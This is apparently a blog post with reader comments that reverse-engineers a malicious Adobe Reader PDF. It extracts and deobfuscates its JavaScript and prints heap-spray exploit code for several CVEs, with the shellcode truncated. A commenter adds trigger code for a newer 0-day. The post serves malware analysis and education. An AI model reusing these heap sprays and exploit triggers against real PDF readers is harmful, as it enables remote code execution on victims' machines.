Reversing the Adobe Reader Exploits – Part 1
Update: Turns out that the sample I was working with is not the new 0-day exploit described here. Once I get a sample of the new PDF exploit I’ll write a new post describing how it works (or read parody’s comment below for a preview).
On December 15, Adobe released a security advisory stating that a new vulnerability had been found in Adobe Reader that could allow arbitrary code execution. Instead of studying for my last two finals, I decided to try my hand at reversing a PDF exploit to figure out what this new vulnerability is and what the in-the-wild malware is doing with it.
I have not looked into PDF exploits before and really don’t know much about the PDF format beyond skimming previous exploit advisories. The advisory itself suggests that this is a JavaScript exploit, since disabling JavaScript is the recommended workaround until Adobe releases a patch. I found a really useful reversing cheat sheet a few weeks ago, and I started off by finding a few tools that looked useful for decoding a PDF file and extracting the JavaScript (PDF Tools Suite and Malzilla). From here I’ll extract the encoded JavaScript from the PDF and work on figuring out what the code does.
Extracting JavaScript from a PDF
The first tool we’ll be using is pdf-parser.py from the PDF Tools suite. This script walks through the sections of a PDF file, displays the raw data in each one, and can decode streams that are encoded (FlateDecode). Running pdf-parser.py on the malicious PDF without any options returns a list of every section in the PDF file, which isn’t very useful since we are only interested in the JavaScript section that hopefully contains the exploit. Instead, you can run pdf-parser.py -s javascript malware.pdf and the script will return only the sections that mention JavaScript. For the PDF in this example it returns:
obj 7 0
 Type:
 Referencing: 10 0 R
 [(1, '\n'), (2, '<<'), (2, '/JavaScript'), (1, ' '), (3, '10'), (1, ' '), (3, ' 0'), (1, ' '), (3, 'R'), (1, '\n'), (2, '>>'), (1, '\n')]
 <<
 /JavaScript 10 0 R
 >>

obj 14 0
 Type:
 Referencing: 13 0 R
 [(1, '\n'), (2, '<<'), (2, '/JS'), (1, ' '), (3, '13'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, '\n'), (2, '/S'), (1, ' '), (2, '/JavaScript'), (1, '\n'), (2, '>>'), (1, '\n')]
 <<
 /JS 13 0 R
 /S /JavaScript
 >>
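To make the search step less of a black box, here is a minimal sketch of how the /JavaScript and /JS references in the output above could be located by hand. It is not how pdf-parser.py works internally; the function name findJavaScriptRefs and the sample text are made up for illustration, and the scan is deliberately naive.

```javascript
// Naive illustration only: real PDFs can hide these keys inside compressed
// object streams or behind #xx name escapes, which this scan will miss.
function findJavaScriptRefs(pdfText) {
  const refs = [];
  // Matches an indirect reference such as "/JS 13 0 R" or "/JavaScript 10 0 R".
  const pattern = /\/(JS|JavaScript)\s+(\d+)\s+(\d+)\s+R/g;
  let match;
  while ((match = pattern.exec(pdfText)) !== null) {
    refs.push({
      key: match[1],
      object: Number(match[2]),
      generation: Number(match[3]),
    });
  }
  return refs;
}

// Hypothetical input that mirrors the two dictionaries shown above.
const sample =
  "7 0 obj\n<<\n/JavaScript 10 0 R\n>>\nendobj\n" +
  "14 0 obj\n<<\n/JS 13 0 R\n/S /JavaScript\n>>\nendobj\n";

console.log(findJavaScriptRefs(sample));
```

The numbers it reports (10 and 13) are the referenced objects, which are the ones worth dumping next.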
I’m lazy and don’t want to read through the PDF reference manual, so we’re going to figure out what to do by brute force and some educated guessing. There is an “object” command in pdf-parser.py that looks like it should return the object referenced by each section. Running that on 7 and 14 (from the “obj 7 0” and “obj 14 0” output above) returns what looks like another section with just a referencing number again. So scratch that, let’s try running the object command on the referenced numbers instead (10 and 13). Running this on 10 gives us:
obj 10 0
 Type:
 Referencing: 14 0 R
 <>
 <<
 /Names [(a) 14 0 R]
 >>
Which isn’t too interesting, but running the object command on 13 gives us what we want:
obj 13 0
 Type:
 Referencing:
 Contains stream
 <>
 <<
 /Length 20297
 >>
Okay, this looks like the JavaScript stream of the file. Now, how do we actually get to the code? After fiddling around with the script, it turns out we want to enable both raw output and the filter option, which decodes the stream data. After doing this we get the actual JavaScript source code:
p ="";
var s = " 10{ 118{ 97{ ............. lots of shellcode!";
ib=eval;
vk=ib;
p ="";
s=s.replace(/[A-Z]/g,function (sda){}).split("{ ");
var JknB="f"+"o";
var qqeerR="r";
var qrt="("+"i";
var HHjdxc="="+"0";
var uiuTW="i"+"<";
var Vqweqwet="l"+"en";
var df="+"+"+";
var TTyreQ="=S";
var nmMJ="o";
var tyuid="o";
var YUiotr="["+"i]"+")"+";"+"}";
vk(JknB+qqeerR+...........);
vk(p);
Okay, this looks more like the obfuscated exploit code that we are looking for! Skimming over it, everything has been obfuscated by randomizing variable names and adding extraneous operations, except for the string replace and split calls and the eval function. The line with replace and split parses the insanely long string at the top into an array of numbers, one step closer to readable code. The eval line is the key: eval is a JavaScript function that executes a string as code, and since vk is just an alias for eval (ib=eval; vk=ib;), each call to vk evaluates a string that the script has assembled from small fragments.
Decoding the Shellcode
At this point, we have a bunch of obfuscated JavaScript that decodes a string into some code and then executes it. We want to know what that code is, and there are basically two ways to find out: replace the eval call with document.write(), or use the Malzilla tool. I’m going to go with Malzilla since it was linked from the cheat sheet mentioned above and I like learning new things.
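The first method (swapping eval for something that only prints) can be sketched roughly as follows. This is an illustration under assumptions, not the exact edit made to the sample: recordInsteadOfEval, captured, and rest are hypothetical names, and the toy fragment is far shorter than the real one.

```javascript
// Everything passed to the hook is recorded as text and never executed.
const captured = [];
function recordInsteadOfEval(code) {
  captured.push(String(code));
}

// The sample aliases eval twice (ib=eval; vk=ib;), so swapping the first
// assignment is enough to redirect every later vk(...) call.
const ib = recordInsteadOfEval;
const vk = ib;

// Toy stand-in for the string-concatenation trick; the real sample builds
// its loop from many more fragments than are shown here.
const JknB = "f" + "o";
const qqeerR = "r";
const rest = "(i=0;i<3;i++){}"; // hypothetical remainder, not from the sample
vk(JknB + qqeerR + rest);

console.log(captured[0]);
```

One catch with this approach: because nothing is executed, any later stage that depends on an earlier eval having run (such as the string p being filled in) has to be reproduced by hand.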

Open Malzilla, go to the “Decoder” tab at the top, and paste in the JavaScript code we have from before. Next, click the “Run Script” button and Malzilla will run the JavaScript code in its own interpreter and store anything that was executed by the eval function. A new window will open with the results; in our case there are two results since there were two lines where eval() was run. The first result is below:
for(i=0;i<s.length;i++)
{
p+=String.fromCharCode(s[i]);
}
This code walks the array s (the long string after it has been split on “{ ”), converts each decimal character code into a character, and appends it to the string p. The second result is the content of p, which the original code executes with vk(p):
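The same decoding can be done outside of Reader or Malzilla. The sketch below assumes the string uses the “{ ” separator seen in the sample and skips the replace() step; decodeCharCodes is a made-up helper name, and only the three codes visible in the excerpt are used as input.

```javascript
// Split on the sample's "{ " separator and map each decimal code to a character.
function decodeCharCodes(encoded) {
  return encoded
    .split("{ ")
    .map((code) => String.fromCharCode(Number(code)))
    .join("");
}

// The first three codes visible in the excerpt: 10, 118, 97.
const prefix = " 10{ 118{ 97";
console.log(JSON.stringify(decodeCharCodes(prefix)));
```

Those three codes decode to a newline followed by “va”, which lines up with the decoded script starting with var.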
var arry = new Array();
function fix_it(yarsp, len)
{
while (yarsp.length*2<len){yarsp += yarsp;}
yarsp = yarsp.substring(0,len/2);
return yarsp;
}
var version = app.viewerVersion;
if (version > 8 )
{
var payload = unescape("%uC033%u8B64........");
nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")
heapblock = nop + payload;
bigblock = unescape("%u0A0A%u0A0A");
headersize = 20;
spray = headersize+heapblock.length;
while (bigblock.length<spray) bigblock+=bigblock;
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length-spray);
while(block.length+spray < 0x40000) block = block+block+fillblock;
mem = new Array();
for (i=0;i<1400;i++) mem[i] = block + heapblock;
var num = 1299999999999999999988........;
util.printf("%45000f",num);
}
if (version < 8 )
{
var addkk = unescape("%uC033%u8B64........");
var mem_array = new Array();
var cc = 0x0c0c0c0c;
var addr = 0x400000;
var sc_len = addkk.length * 2;
var len = addr - (sc_len+0x38);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var count2 = (cc - 0x400000)/addr;
for (var count=0;count < count2;count++)
{
mem_array[count] = yarsp + addkk;
}
var overflow = unescape("%u0c0c%u0c0c");
while(overflow.length < 44952) overflow += overflow;
this.collabStore = Collab.collectEmailInfo({subj: "",msg: overflow});
}
if (version < 9.1)
{
if (app.doc.Collab.getIcon){
var vvpethya =unescape("%uC033%u8B64........");
var hWq500CN = vvpethya.length * 2;
var len = 0x400000 - (hWq500CN + 0x38);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
arry[vqcQD96y] = yarsp + vvpethya;}
var tUMhNbGw = unescape("%09");
while (tUMhNbGw.length < 0x4000)tUMhNbGw += tUMhNbGw;
tUMhNbGw = "N." + tUMhNbGw;
app.doc.Collab.getIcon(tUMhNbGw);
}
}
So what was only 21 lines and two eval() statements has ballooned into this, which would have been executed by the second eval if we were running in Adobe Reader. I’ve put a copy on Pastebin for easier reading.
Analyzing the Shellcode
If you skim through the decoded script, you can quickly see that the malware checks which version of Adobe Reader it is running in and picks an exploit based on that. Each branch also contains the same Unicode-encoded string (%uC033%u8B64…), which is the actual shellcode that will be executed on the host machine.
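To look at that string as raw bytes, the %uXXXX escapes have to be unpacked. A minimal sketch, assuming a little-endian x86 target so that the low byte of each 16-bit unit comes first in memory; percentUToBytes is a hypothetical helper, and only the two units visible in the excerpt are decoded.

```javascript
// Turn "%uXXXX" escapes into the byte sequence they occupy in memory.
function percentUToBytes(escaped) {
  const bytes = [];
  const pattern = /%u([0-9a-fA-F]{4})/g;
  let match;
  while ((match = pattern.exec(escaped)) !== null) {
    const unit = parseInt(match[1], 16);
    bytes.push(unit & 0xff);        // low byte is stored first (little-endian)
    bytes.push((unit >> 8) & 0xff); // high byte follows
  }
  return bytes;
}

const hex = percentUToBytes("%uC033%u8B64")
  .map((b) => b.toString(16).padStart(2, "0"))
  .join(" ");
console.log(hex); // 33 c0 64 8b
```

On x86, 33 C0 is xor eax, eax and 64 is the FS segment prefix, which is at least consistent with the string being machine code rather than text.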
Version Higher than 8
The first branch targets Adobe Reader versions higher than 8 (the check is version > 8) and exploits CVE-2008-2992, a vulnerability in the util.printf function (the call on the last line of this branch; a quick Google search determined which vulnerability was being exploited). Coincidentally, it turns out the malware is using a modified version of Debasis Mohanty’s demonstration code.
Version Lower than 8
The second branch targets Adobe Reader versions lower than 8 and exploits the vulnerability described in APSA08-01 (CVE-2007-5659), which is in the Collab.collectEmailInfo() function (again, the last line of this branch). This code is also modified from published exploit code.
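The arithmetic in this branch is easier to follow with numbers plugged in. The sketch below reuses fix_it and the constants from the decoded script, but the shellcode length of 400 characters is a made-up placeholder (the real payload is elided above), and the interpretation in the comments is an educated guess.

```javascript
// Same logic as fix_it in the decoded script: grow the filler by doubling,
// then trim it to len bytes (two bytes per JavaScript character).
function fix_it(yarsp, len) {
  while (yarsp.length * 2 < len) yarsp += yarsp;
  return yarsp.substring(0, len / 2);
}

const blockSize = 0x400000;   // "addr" in the script
const target = 0x0c0c0c0c;    // "cc" in the script
const shellcodeChars = 400;   // hypothetical: the real payload is elided
const scLen = shellcodeChars * 2;

// Filler length leaves room for the shellcode plus 0x38 bytes,
// presumably to account for allocation overhead.
const len = blockSize - (scLen + 0x38);
const sled = fix_it("\u9090\u9090", len);
const blockBytes = (sled.length + shellcodeChars) * 2;

// Number of blocks the loop allocates.
const ratio = (target - blockSize) / blockSize;
let iterations = 0;
for (let count = 0; count < ratio; count++) iterations++;

console.log("bytes per block: 0x" + blockBytes.toString(16));
console.log("blocks allocated: " + iterations);
```

Each block comes out 0x38 bytes short of 4 MB, and 48 of them are allocated, about 192 MB in total. The intent appears to be filling memory up to the neighborhood of 0x0c0c0c0c, the value the overflow string is built from.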
Version Lower than 9.1
The third branch targets Adobe Reader versions less than 9.1 and exploits CVE-2009-0927, which is a vulnerability in the app.doc.Collab.getIcon() function (again, the last line of this branch).
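The three version checks are independent if statements rather than an if/else chain, so more than one can be true for a given version. A small sketch of which conditions hold, assuming app.viewerVersion is a plain number and that Collab.getIcon is present unless stated otherwise; branchesFor is a hypothetical helper, not part of the sample.

```javascript
// Mirrors the three conditions in the decoded script and reports which hold.
function branchesFor(version, hasGetIcon = true) {
  const hits = [];
  if (version > 8) hits.push("util.printf");
  if (version < 8) hits.push("Collab.collectEmailInfo");
  if (version < 9.1 && hasGetIcon) hits.push("Collab.getIcon");
  return hits;
}

for (const v of [7, 8, 8.1, 9, 9.1]) {
  console.log(v, branchesFor(v).join(", ") || "(none)");
}
```

This only shows which checks pass. In a real run, a successful exploit in an earlier branch would take over before the later ones are reached.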
What’s Next
I actually need to study for my finals, so I’m going to have to quit here. The next post will most likely start with trying to figure out what the Unicode encoded string represents (teaser, I’ve already found a URL and I assume the rest is ASM) and then do some dynamic analysis of actually opening the malicious PDF and seeing what actions it takes. Feel free to post any questions or corrections in the comments!
Nice work! :]
The sample doesn’t look to be the exploit for the new bug against adobe though.
Sample I have uses the following javascript to trigger the new bug.
var memory;
if(app.viewerVersion >=
{
function NS() {
var nop = unescape('%u9090%u9090');
var sc = unescape('%u6090%uec81%u03e8%u0000%uc083%u8364….%u0000%u0000');
while(nop.length <= 0x10000/2) nop+=nop;
nop=nop.substring(0,0x10000/2 - sc.length);
memory=new Array();
for(i=0;i<0x1000;i++) {
memory[i]=nop + sc;
}
}
NS();
try {this.media.newPlayer(null);} catch(e) {}
util.printd("p@111111111111111111111111 : yyyy111", new Date());
…
good luck with your finals :]
parody is right, your example is for the util.printf vulnerability (CVE-2008-2992)
His example is an exploit for the new Adobe 0-day. You can use my PDF-tools to create a PDF sample with his JS code.
If you don’t have python installed, another option for extracting the javascript is to use pdftk.
CMD:
pdftk malicious_file.pdf output out.pdf uncompress
Then open out.pdf in a text editor such as Notepad and copy out the JavaScript.
Cool write up.
@arebc
Here’s a link to pdftk:
http://www.accesspdf.com/pdftk/
@arebc
Anyone have a PDF example of this we can use for testing the blacklist framework in Acrobat?